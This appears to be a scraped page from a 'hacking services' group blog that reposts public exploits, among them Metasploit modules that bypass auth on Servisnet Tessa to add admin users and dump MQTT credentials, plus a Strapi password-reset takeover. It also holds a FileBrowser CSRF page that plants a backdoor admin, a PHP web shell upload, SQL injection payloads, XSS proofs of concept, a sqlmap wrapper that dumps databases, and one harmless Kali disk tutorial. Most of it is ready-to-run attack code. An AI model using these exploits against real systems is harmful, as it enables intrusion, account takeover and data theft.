Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863131721

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',
      'Description'    => %q(
        This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.
		The app.js is publicly available which acts as the backend of the application.
                By exposing a default value for the "Authorization" HTTP header, 
                it is possible to make unauthenticated requests to some areas of the application. 
                Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
                A new admin user can be added to the database with this header obtained in the source code.		

      ),
      'References'     =>
        [
          [ 'CVE', 'CVE-2022-22831' ],
          [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],
          [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "Dec 22 2021",
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL'   => true
        }
    ))

    register_options([
        OptString.new('TARGETURI',  [true, 'Base path for application', '/'])
    ])
  end
  # split strings to salt
  def split(data, string_to_split)  
    word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
    string = word.split('"]').join('').split('["').join('')
    return string
  end 
  # for Origin and Referer headers

  def app_path
    res = send_request_cgi({
    # default.a.get( check 
      'uri'     => normalize_uri(target_uri.path, 'js', 'app.js'),
	  'method'  => 'GET'
    })  	
	
    if res && res.code == 200 && res.body =~ /baseURL/
      data = res.body
      #word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
      base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0]
      print_status("baseURL: #{base_url}")  
      return base_url
    else
      fail_with(Failure::NotVulnerable, 'baseURL not found!')
    end
  end

  def add_user
     token = auth_bypass
     newuser = Rex::Text.rand_text_alpha_lower(8)	
     id = Rex::Text.rand_text_numeric(4)   
     # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111
     json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'

     res = send_request_cgi(
       {
       'method' => 'POST',
       'ctype'  => 'application/json',
       'uri' => normalize_uri(target_uri.path, app_path, 'users'),
       'headers' =>
         {
           'Authorization' => token
         },
       'data' => json_data
      })

      if res && res.code == 200 && res.body =~ /localhost/
        print_good("The sysAdmin authorized user has been successfully added.")
        print_status("Username: #{newuser}")
        print_status("Password: 1111111111")
      else
        fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')
      end
  end

  def auth_bypass

    res = send_request_cgi({
    # default.a.defaults.headers.post["Authorization"] check 
      'uri'     => normalize_uri(target_uri.path, 'js', 'app.js'),
	  'method'  => 'GET'
    })  	
	
    if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
	  token = split(res.body, 'Authorization')
	  print_status("Authorization: #{token}")  
          return token
	else
	  fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
	end

  end

  def check 	
	
    if auth_bypass =~ /Basic/ 
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
  
  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    add_user    
  end
end
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/mqtt'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::MQTT
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)',
      'Description'    => %q(
        This module exploits MQTT creds dump vulnerability in Servisnet Tessa.
		The app.js is publicly available which acts as the backend of the application.
                By exposing a default value for the "Authorization" HTTP header, 
                it is possible to make unauthenticated requests to some areas of the application. 
                Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
                A new admin user can be added to the database with this header obtained in the source code.	

        The module tries to log in to the MQTT service with the credentials it has obtained, 
        and reflects the response it receives from the service.	

      ),
      'References'     =>
        [
          [ 'CVE', 'CVE-2022-22833' ],
          [ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ],
          [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "Dec 22 2021",
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL'   => true
        }
    ))

    register_options([
        OptString.new('TARGETURI',  [true, 'Base path for application', '/'])
    ])
  end
  # split strings to salt
  def split(data, string_to_split)  
    word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
    string = word.split('"]').join('').split('["').join('')
    return string
  end 

  def check_mqtt
   res = send_request_cgi({
   # default.a.get( check 
     'uri'     => normalize_uri(target_uri.path, 'js', 'app.js'),
	 'method'  => 'GET'
   })  	
	
   if res && res.code == 200 && res.body =~ /connectionMQTT/
      data = res.body
      #word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
      mqtt_host = data.scan(/host: '([\S\s]*?)'/)[0][0]
      rhost = mqtt_host.split('mqtts://').join('')
      print_status("MQTT Host: #{mqtt_host}")  
      mqtt_port = data.scan(/port: ([\S\s]*?),/)[0][0]
      print_status("MQTT Port: #{mqtt_port}") 
      mqtt_end = data.scan(/endpoint: '([\S\s]*?)'/)[0][0]
      print_status("MQTT Endpoint: #{mqtt_end}") 
      mqtt_cl = data.scan(/clientId: '([\S\s]*?)'/)[0][0]
      print_status("MQTT clientId: #{mqtt_cl}")
      mqtt_usr = data.scan(/username: '([\S\s]*?)'/)[1][0]
      print_status("MQTT username: #{mqtt_usr}")
      mqtt_pass = data.scan(/password: '([\S\s]*?)'/)[1][0]
      print_status("MQTT password: #{mqtt_pass}")

      print_status("##### Starting MQTT login sweep #####")

      # Removed brute force materials that can be included for the collection.
      cred_collection = Metasploit::Framework::CredentialCollection.new(
        password: mqtt_pass,
        username: mqtt_usr
      )
      # this definition already exists in "auxiliary/scanner/mqtt/connect". Moved into exploit.
      cred_collection = prepend_db_passwords(cred_collection)

      scanner = Metasploit::Framework::LoginScanner::MQTT.new(
        host: rhost,
        port: mqtt_port,
        read_timeout: datastore['READ_TIMEOUT'],
        client_id: client_id,
        proxies: datastore['PROXIES'],
        cred_details: cred_collection,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: datastore['ConnectTimeout'],
        max_send_size: datastore['TCP::max_send_size'],
        send_delay: datastore['TCP::send_delay'],
        framework: framework,
        framework_module: self,
        ssl: datastore['SSL'],
        ssl_version: datastore['SSLVersion'],
        ssl_verify_mode: datastore['SSLVerifyMode'],
        ssl_cipher: datastore['SSLCipher'],
        local_port: datastore['CPORT'],
        local_host: datastore['CHOST']
      )

      scanner.scan! do |result|
        credential_data = result.to_h
        credential_data.merge!(
          module_fullname: fullname,
          workspace_id: myworkspace_id
        )
        password = result.credential.private
        username = result.credential.public
        if result.success?
          credential_core = create_credential(credential_data)
          credential_data[:core] = credential_core
          create_credential_login(credential_data)
          print_good("MQTT Login Successful: #{username}/#{password}")
        else
          invalidate_login(credential_data)
          vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})")
        end
      end
     end
  end

  def auth_bypass
    res = send_request_cgi({
    # default.a.defaults.headers.post["Authorization"] check 
      'uri'     => normalize_uri(target_uri.path, 'js', 'app.js'),
	  'method'  => 'GET'
    })  	
	
    if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
     token = split(res.body, 'Authorization')
     print_status("Authorization: #{token}")  
     return token
    else
     fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
  end

  def check 		
    if auth_bypass =~ /Basic/ 
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
  
  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    check_mqtt    
  end
end
HireHackking 
# Exploit Title: FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 5/2/2022
# Exploit Author: FEBIN MON SAJI
# Vendor Homepage: https://filebrowser.org/
# Software Link: https://github.com/filebrowser/filebrowser
# Version: FileBrowser <= 2.17.2
# Tested on: Ubuntu 20.04
# CVE : CVE-2021-46398

1. Description:

A Cross-Site Request Forgery vulnerability exists in Filebrowser < 2.18.0 that allows attackers to create a backdoor user with admin privilege and get access to the filesystem via a malicious HTML webpage that is sent to the victim. An admin can run commands using the FileBrowser and hence it leads to RCE.

2. Proof Of Concept:

<html>
   <script> 
   setTimeout(function() {document.forms["exploit"].submit();}, 3000);
   </script>
  <body style="text-align:center;">
  <h1> FileBrowser CSRF PoC by Febin </h1>
 
  <!-- This create a admin privileged backdoor user named "pwned" with password "pwned" -->
  
  <!-- Change the URL in the form action -->
  
    <form action="http://127.0.0.1:8080/api/users" method="POST" enctype="text/plain" name="exploit">
     
      <!-- Change the "scope" parameter in the payload as your choice -->
     
      <input type="hidden" name='{"what":"user","which":[],"data":{"scope":"../../../../root/","locale":"en","viewMode":"mosaic","singleClick":false,"sorting":{"by":"","asc":false},"perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"hideDotfiles":false,"username":"pwned","password":"","rules":[{"allow":true,"path":"../","regex":false,"regexp":{"raw":""}}],"lockPassword":false,"id":0,"password":"pwned"}}' value='test'>
    
    </form>

  </body>

</html>



3. HTTP request intercept:

POST /api/users HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 465
Connection: close
Cookie: auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoxLCJsb2NhbGUiOiJlbiIsInZpZXdNb2RlIjoibW9zYWljIiwic2luZ2xlQ2xpY2siOmZhbHNlLCJwZXJtIjp7ImFkbWluIjp0cnVlLCJleGVjdXRlIjp0cnVlLCJjcmVhdGUiOnRydWUsInJlbmFtZSI6dHJ1ZSwibW9kaWZ5Ijp0cnVlLCJkZWxldGUiOnRydWUsInNoYXJlIjp0cnVlLCJkb3dubG9hZCI6dHJ1ZX0sImNvbW1hbmRzIjpbXSwibG9ja1Bhc3N3b3JkIjpmYWxzZSwiaGlkZURvdGZpbGVzIjpmYWxzZX0sImV4cCI6MTY0NDA4OTE3MiwiaWF0IjoxNjQ0MDgxOTcyLCJpc3MiOiJGaWxlIEJyb3dzZXIifQ.hdFWg3SIQQ-4P8K48yru-152NGItZPKau6EBL6m8RJE
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-GPC: 1

{"what":"user","which":[],"data":{"scope":"../../../../root/","locale":"en","viewMode":"mosaic","singleClick":false,"sorting":{"by":"","asc":false},"perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"hideDotfiles":false,"username":"pwned","password":"","rules":[{"allow":true,"path":"../","regex":false,"regexp":{"raw":""}}],"lockPassword":false,"id":0,"password":"pwned"}}=test


4. References:

https://febin0x4e4a.wordpress.com/2022/01/19/critical-csrf-in-filebrowser/
https://febin0x4e4a.blogspot.com/2022/01/critical-csrf-in-filebrowser.html
https://systemweakness.com/critical-csrf-to-rce-in-filebrowser-865a3c34b8e7



5. Detailed Description:

The Vulnerability - CSRF to RCE

FileBrowser is a popular file manager/file managing interface developed in the Go language. Admin can create multiple users, even another Admin privileged user, and give access to any directory he wants, the user creation is handled by an endpoint “/api/users”.

The endpoint accepts input in JSON format to create users, but fails to verify that the “Content-Type” HTTP header, the Content-Type header’s value should be “application/json” but it accepts “text/plain” and that’s where the vulnerability arises. Also, the “Origin” is not validated and there are no anti-CSRF tokens implemented either.

Hence an attacker can easily exploit this vulnerability to create a backdoor user with admin privileges and access to the home directory or whichever directory the attacker wants to access, just by sending a malicious webpage URL to the legitimate admin and access the whole filesystem of the victim.

And an admin can run commands on the system, so this vulnerability leads to an RCE.
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,

      'Name'           => "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",
      'Description'    => %q{
        This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'WackyH4cker' ],
      'References'     =>
        [
          [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ]
        ],
      'Platform'       => 'linux',
      'Targets'        => [
        [ 'Strapi 3.0.0-beta-17.4', {} ]
      ],
      'Payload'        => '',
      'Privileged'     => true,
      'DisclosureDate' => "",
      'DefaultOptions' => 
        {
          'SSL' => 'False',
          'RPORT' => 80,
        },
      'DefaultTarget'  => 0

      ))

      register_options [
        OptString.new('NEW_PASSWORD', [true, 'New password for user Admin'])
      ]
  end

  def check

    res = send_request_raw({ 'uri' => '/admin/init' })
    version = JSON.parse(res.body) 

    if version["data"]["strapiVersion"] == '3.0.0-beta.17.4'
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
    
  end

  def run

    json_body = { 'code' => {'$gt' => 0},
      'password' => datastore['NEW_PASSWORD'],
      'passwordConfirmation' => datastore['NEW_PASSWORD'] }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => '/admin/auth/reset-password',
      'ctype' => 'application/json',
      'data' => JSON.generate(json_body)
    })

    print_status("Changing password...")
    json_format = JSON.parse(res.body)
    jwt = json_format['jwt']

    if res.code == 200
      print_good("Password changed successfully!")
      print_good("USER: admin")
      print_good("PASSWORD: #{datastore['NEW_PASSWORD']}")
      print_good("JWT: #{jwt}")
    else
      fail_with(Failure::NoAccess"Could not change admin user password")
    end
  end

end
HireHackking

Hospital Management System 4.0 - 'multiple' SQL Injection

HACKER · %s · %s

# Title: Hospital Management System 4.0 - 'multiple' SQL Injection # Author: nu11secur1ty # Date: 02.06.2022 # Vendor: https://github.com/kishan0725 # Software: https://github.com/kishan0725/Hospital-Management-System # CVE-2022-24263 ## Description: The Hospital Management System v4.0 is suffering from Multiple SQL-Injections via three parameters in function.php, contact.php, and func3.php applications. The attacker can be receiving the all information from the system by using this vulnerability, and also the malicious actor can use sensitive information from the customers of this system. WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous! Status: CRITICAL [+] Payloads: --- Parameter: txtName (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: txtName=821761' AND (SELECT 9346 FROM (SELECT(SLEEP(3)))HJGv) AND 'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send Message&txtMsg=441931 --- ------------------------------------------- --- Parameter: #1* ((custom) POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936) OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN 1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730) UNION ALL SELECT 8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login --- ------------------------------------------- --- Parameter: #1* ((custom) POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0 END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login --- ## Reproduce: https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263
HireHackking
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS) # Date: 2022-02-04 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/ # Version: 1.2 # Tested on: Windows 11 # CVE: N/A 1. Description: This plugin creates a cf7-international-sms-integration from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=<script>alert("test")</script>
HireHackking

Title: Expand the disk for Kali Linux

HACKER · %s · %s

Before, when installing the system for Kali, 40G disks were allocated, but as more and more files are stored in Kali, kali's disk possession is no longer enough. So how to expand the kali disk?
First, let’s take a look at the remaining space of this unit.
df
As you can see, disk ownership has accounted for 100%.
Allocate space to kali
Run the virtual machine settings, click Add below - Add Hard Drive
Here I am adding 10G capacity
Execute the following command in the terminal
fdisk -l Here we see the 10G capacity hard disk we just added.
Next we need to partition /dev/sda
Execute the command
fdisk /dev/sda
Format partition
mke2fs -t ext4 /dev/sda
mount disk
At this time, I want to mount the /root directory of 10G capacity
Execute the command
mount /dev/sda /root, but this can only be used once, that is, our mount will be lost after the PC is restarted, and we can set the configuration file
Modify the configuration file
The format is as follows:
UUID=Mount directory File system format Permanent Whether to backup Whether to self-check
UUID is available through blkid
vim /etc/fstab
In this way, we have completed the expansion of the disk
HireHackking
# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-02-08 # Exploit Author: Juli Agarwal(@agarwaljuli) # Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code # Version: 1.0 # Tested on: XAMPP, Kali Linux Description – The application suffers from a remote code execution in the admin panel. An authenticated attacker can upload a web-shell php file in profile page to achieve remote code execution. POC:- ========== # Request: ========== POST /erms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------37791356766765055891341961306 Content-Length: 1004 Origin: http://localhost Connection: close Referer: http://localhost/erms/admin/?page=user Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="id" 1 -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="firstname" Adminstrator -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="lastname" Admin -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="username" admin -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="password" -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/x-php <html> <body> <b>Remote code execution: </b><br><pre> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> </pre> </body> </html> -----------------------------37791356766765055891341961306— ================ # Webshell access: ================ # Webshell access via: POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id # Webshell response: Remote code execution: uid=1(daemon) gid=1(daemon) groups=1(daemon)
HireHackking

Cain & Abel 4.9.56 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Cain & Abel 4.9.56 - Unquoted Service Path # Exploit Author: Aryan Chehreghani # Date: 2022-02-08 # Software Link: https://www.malavida.com/en/soft/cain-and-abel # Version: 4.9.56 # Tested on: Windows 10 x64 # PoC SERVICE_NAME: Abel TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Cain\Abel64.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Abel DEPENDENCIES : SERVICE_START_NAME : LocalSystem
HireHackking

Exam Reviewer Management System 1.0 - ‘id’ SQL Injection

HACKER · %s · %s

# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection # Date: 2022-02-18 # Exploit Author: Juli Agarwal(@agarwaljuli) # Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux Description – The ‘id’ parameter in Exam Reviewer Management System web application is vulnerable to SQL Injection Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1 POC:- --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo) AND 'vqGg'='vqGg--- *SQLMAP COMMAND* *# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1 <http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*
HireHackking
# Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated) # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux Home Owners Collection Management System is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters #Steps to Reproduce 1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters. 2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password ============================================== POST /hocms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391 Content-Length: 899 Origin: http://localhost Connection: close Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="id" -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="firstname" hi -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="lastname" test -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="username" saud -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="password" saud -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="type" 1 -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------8012296389370411172619882391--
HireHackking
# Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated) # Date 08.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://ays-pro.com/ # Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip # Version: < 2.8.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24931 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md ''' Description: The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection. ''' banner = ''' .--. .-..-. .--. .---. .--. .---. ,-. .---. .-. .--. .----. ,-. : .--': :: :: .--' `--. :: ,. :`--. :.' : `--. : .'.': .; :`-- ;.' : : : : :: :: `; _____ ,',': :: : ,',' `: : _____ ,','.'.'_`._, : .' ' `: : : :__ : `' ;: :__:_____:.'.'_ : :; :.'.'_ : ::_____:.'.'_ :_ ` : : : _`,`. : : `.__.' `.,' `.__.' :____;`.__.':____; :_; :____; :_: :_:`.__.' :_; [+] Copy Content Protection and Content Locking - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH # Exploit: print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
HireHackking

WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS) # Date: 2022-02-07 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/jetpack # Version: 9.1 # Tested on: Windows 11 # CVE: N/A 1. Description: This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert("BY Ex3ptionaL")</script>
HireHackking
